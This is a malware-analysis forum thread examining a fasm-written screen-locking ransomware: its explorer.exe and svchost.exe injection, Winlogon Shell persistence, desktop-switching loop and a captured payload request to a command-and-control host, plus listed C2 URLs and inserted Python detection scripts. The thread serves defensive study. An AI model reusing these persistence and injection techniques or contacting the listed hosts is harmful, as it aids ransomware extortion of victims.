A forum for reverse engineering, OS internals and malware analysis 

 #15975  by rkhunter
 Sat Oct 13, 2012 10:32 am
Win32:Virut wrote:
Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks
SHA256: e19c8f1ea80d6cf9d3348a07c7428bbcdfc66ea5a192f63e22a8e29cfda5aaf0
SHA1: fae01f374d5dde3271306aca91f842f9f0b17d75
MD5: 0efd95e4d3502e20b7120685050abae2
File size: 44032 bytes
Attachment (archive password: infected)
 #16674  by rinn
 Sat Nov 17, 2012 6:09 pm
Hi.

This is an interesting ransom. It is written in fasm 1.7 and this makes it something special. Usually ransomware is Delphi applications written by people with no programming skills. This one is different. It is still simple compared to famous trojans, but there are some features which make it special.

It has a three-stage startup.

In the first stage it registers the window class "SetupFrameClass", creates a window called "Setup" and waits a few milliseconds. After wnd_procedure (see @004012D0) assumes control, it calls specially prepared code (see @004013A0) responsible for the second stage and further trojan installation.

Second stage - memory injection into explorer.exe. After this code activates, it creates a new special desktop named wLockDesktop, starts a zombified copy of svchost.exe with (again) injected trojan code and the initial process desktop value set to wLockDesktop. Then execution transfers to this zombified svchost.exe.

The third stage is responsible for setting the autorun registry key

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell with value explorer.exe,%userprofile%\Application Data\msconfig.dat

<--- it is the ransom itself (the file copy routine also takes place in this stage).

The ransom (code running inside svchost.exe) ensures that wLockDesktop is the current active desktop by periodically switching to it. This was done to defeat Sysinternals Desktops and similar tools.

Decrypted and working dropper attached. Password "infected" without quotes.

Best Regards,
-rin
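The persistence mechanism rinn describes (an extra entry appended to the Winlogon "Shell" value) is easy to audit, because Winlogon treats that value as a comma-separated list of programs to start at logon and a clean configuration holds only explorer.exe. The following check is an added example, not code from the thread or from the sample; the function names, the live-registry helper and the sample value are my own construction, the sample value being the one quoted in the post above.

```python
r"""Winlogon "Shell" persistence check (added example, not code from the thread).

The post above describes persistence through
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell set to
"explorer.exe,%userprofile%\Application Data\msconfig.dat". Winlogon treats the
value as a comma-separated list of programs to start at logon, so every entry
after the usual explorer.exe runs as the user. The checks below flag such extras.
Function names and thresholds are this example's own assumptions.
"""
import os
import sys

EXPECTED_SHELL = "explorer.exe"
WINLOGON_SUBKEY = r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon"


def split_shell_value(value):
    """Split a Shell value the way Winlogon does: on commas, ignoring blanks."""
    return [item.strip() for item in value.split(",") if item.strip()]


def suspicious_shell_entries(value):
    """Return every entry of a Shell value other than the plain explorer.exe."""
    return [entry for entry in split_shell_value(value)
            if entry.lower() != EXPECTED_SHELL]


def describe_entry(entry):
    """Expand environment variables in an entry and report whether the file exists."""
    expanded = os.path.expandvars(entry)  # %var% is expanded on Windows only
    return {"entry": entry, "expanded": expanded, "exists": os.path.isfile(expanded)}


def audit_shell_value(value):
    """Return one finding dict per entry that is not explorer.exe."""
    return [describe_entry(entry) for entry in suspicious_shell_entries(value)]


def read_winlogon_shell(per_user=True):
    """Read the live Shell value (Windows only); None when absent or not on Windows.

    The per-user (HKCU) Winlogon key normally carries no Shell value at all;
    explorer.exe is configured under HKLM. A Shell value under HKCU is therefore
    itself worth a look, whatever it contains.
    """
    if sys.platform != "win32":
        return None
    import winreg  # standard library, importable on Windows only
    hive = winreg.HKEY_CURRENT_USER if per_user else winreg.HKEY_LOCAL_MACHINE
    try:
        with winreg.OpenKey(hive, WINLOGON_SUBKEY) as key:
            value, _value_type = winreg.QueryValueEx(key, "Shell")
            return value
    except OSError:
        return None


if __name__ == "__main__":
    # Constructed sample: the value quoted in the post above.
    sample = r"explorer.exe,%userprofile%\Application Data\msconfig.dat"
    for finding in audit_shell_value(sample):
        print("extra Shell entry:", finding)
    live = read_winlogon_shell(per_user=True)
    if live is not None:
        print("HKCU Shell value present:", live, audit_shell_value(live))
```

Run on a Windows host, the script reads the live HKCU value and reports anything after explorer.exe; elsewhere it only audits the constructed sample. The comparison is case-insensitive because the registry value is, and anything other than the bare explorer.exe (a full path to explorer included) is reported rather than silently accepted.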
 #16678  by EP_X0FF
 Sun Nov 18, 2012 7:00 am
Switching to a different desktop is set in an infinite loop with a very small delay.
00000039	273.98556519	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000040	274.08596802	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000041	274.18600464	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000042	274.28622437	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000043	274.38613892	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000044	274.48648071	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000045	274.59146118	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000046	274.68685913	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000047	274.78668213	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000048	274.90359497	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000049	275.01293945	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000050	275.10397339	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000051	275.20385742	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000052	275.32345581	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000053	275.43780518	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000054	275.52349854	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000055	275.62338257	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000056	275.72372437	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
Winlock window hierarchy (different run, that's why the PID differs).

[screenshot of the window hierarchy not reproduced]

It uses an embedded IE window to display HTML-based content.

The payload is requested in an encrypted container, with a special marker prepended to the request string: "55565755".
GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1
User-Agent: Our_Agent
Host: hhrbn.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 18 Nov 2012 01:11:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Cache-Control: public
Content-Disposition: attachment; filename=32721
Content-Transfer-Encoding: binary
Content-Length: 83722
It is decrypted into the %temp% folder and then executed by the ransom from the embedded full-screen IE window. Ransom page + all graphics/CSS attached.
Attachment (archive password: malware)
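Two observations in EP_X0FF's post translate directly into detection logic: a process that retries a switch to the same desktop many times per second, and a download path that is the fixed marker "55565755" followed by a hex string. The block below is an added example, not code from the thread or from any monitoring tool; the monitor-log format is taken from the lines quoted above (ten of them are reused as constructed sample input), the HTTP capture sample is constructed from the request shown in the post, and the function names and thresholds are assumptions.

```python
"""Detections for the two behaviours in EP_X0FF's post (added example, not from the thread).

1. The locker retries the switch to wLockDesktop in a tight loop. Given a monitor log of
   the form shown in the post (ten of its lines are reused below as constructed sample
   input), flag any process that retries the same target desktop many times inside a
   short window.
2. The payload request path is the marker "55565755" followed by a hex string, so a
   proxy log or captured request can be screened for that shape.
The log layout, function names and thresholds are this example's own assumptions.
"""
import re

SWITCH_LINE = re.compile(
    r"^\s*(?P<seq>\d+)\s+(?P<ts>\d+\.\d+)\s+\[(?P<proc>\d+)\]\s+"
    r"pid:\s*(?P<pid>\d+)\s+tid:\s*(?P<tid>\d+)\s+"
    r"Attempt to switch current desktop, target (?P<target>\S+) - request denied"
)

# Constructed sample: ten of the monitor lines quoted in the post above.
SAMPLE_LOG = """\
00000039  273.98556519  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000040  274.08596802  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000041  274.18600464  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000042  274.28622437  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000043  274.38613892  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000044  274.48648071  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000045  274.59146118  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000046  274.68685913  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000047  274.78668213  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000048  274.90359497  [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
""".splitlines()


def parse_switch_events(lines):
    """Yield (timestamp, pid, target) for every desktop-switch attempt line; skip the rest."""
    for line in lines:
        m = SWITCH_LINE.match(line)
        if m:
            yield float(m.group("ts")), int(m.group("pid")), m.group("target")


def find_switch_loops(lines, min_events=8, window_s=5.0):
    """Return {(pid, target): peak count} for pairs with >= min_events attempts in any window_s span."""
    stamps_by_key = {}
    for ts, pid, target in parse_switch_events(lines):
        stamps_by_key.setdefault((pid, target), []).append(ts)
    flagged = {}
    for key, stamps in stamps_by_key.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_s:  # slide the window's left edge forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_events:
            flagged[key] = peak
    return flagged


PAYLOAD_MARKER = "55565755"  # marker quoted in the post
MARKED_PATH = re.compile(r"/" + PAYLOAD_MARKER + r"[0-9A-Fa-f]+")
REQUEST_LINE = re.compile(r"^(?:GET|POST) (\S+) HTTP/1\.[01]$", re.MULTILINE)

# Constructed sample capture: the request from the post plus an unrelated one.
SAMPLE_CAPTURE = """\
GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1
User-Agent: Our_Agent
Host: hhrbn.ru

GET /gateway.php HTTP/1.1
Host: hhrbn.ru
"""


def is_marked_payload_path(path):
    """True when a request path is exactly the marker followed by one or more hex digits."""
    return MARKED_PATH.fullmatch(path) is not None


def marked_requests(http_text):
    """Return the request paths in captured HTTP text that carry the payload marker."""
    return [p for p in REQUEST_LINE.findall(http_text) if is_marked_payload_path(p)]


if __name__ == "__main__":
    for (pid, target), count in find_switch_loops(SAMPLE_LOG).items():
        print(f"pid {pid}: {count} switch attempts to {target} inside one window")
    for path in marked_requests(SAMPLE_CAPTURE):
        print("marked payload request:", path)
```

The sliding window keeps the check linear in the number of events and independent of the monitor's exact polling interval; on the sample lines above all ten attempts fall inside one five-second window, while a threshold of eleven returns nothing. The request check deliberately requires the whole path to be marker plus hex, so that ordinary paths that merely contain the digits are not matched.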
 #16680  by Xylitol
 Sun Nov 18, 2012 10:43 am
EP_X0FF wrote:
Host: hhrbn.ru

Not at home this weekend so can't attack/disassemble stuff, but found this
rnmbe.su/hhrbn.ru
hxxp://46.37.162.28:80/user/login/ « auth service »
hxxp://hhrbn.ru:80/data.php
hxxp://hhrbn.ru:80/config.php
hxxp://hhrbn.ru:80/gateway.php
hxxp://hhrbn.ru:80/includes/rc4.php
hxxp://hhrbn.ru:80/includes/mysql.php
hxxp://hhrbn.ru:80/includes/functions.php
hxxp://hhrbn.ru:80/config/
hxxp://hhrbn.ru:80/cache/
mysql.php returns "could not find driver"; the rest are standard HTTP 200/Length 0, probably need parameters.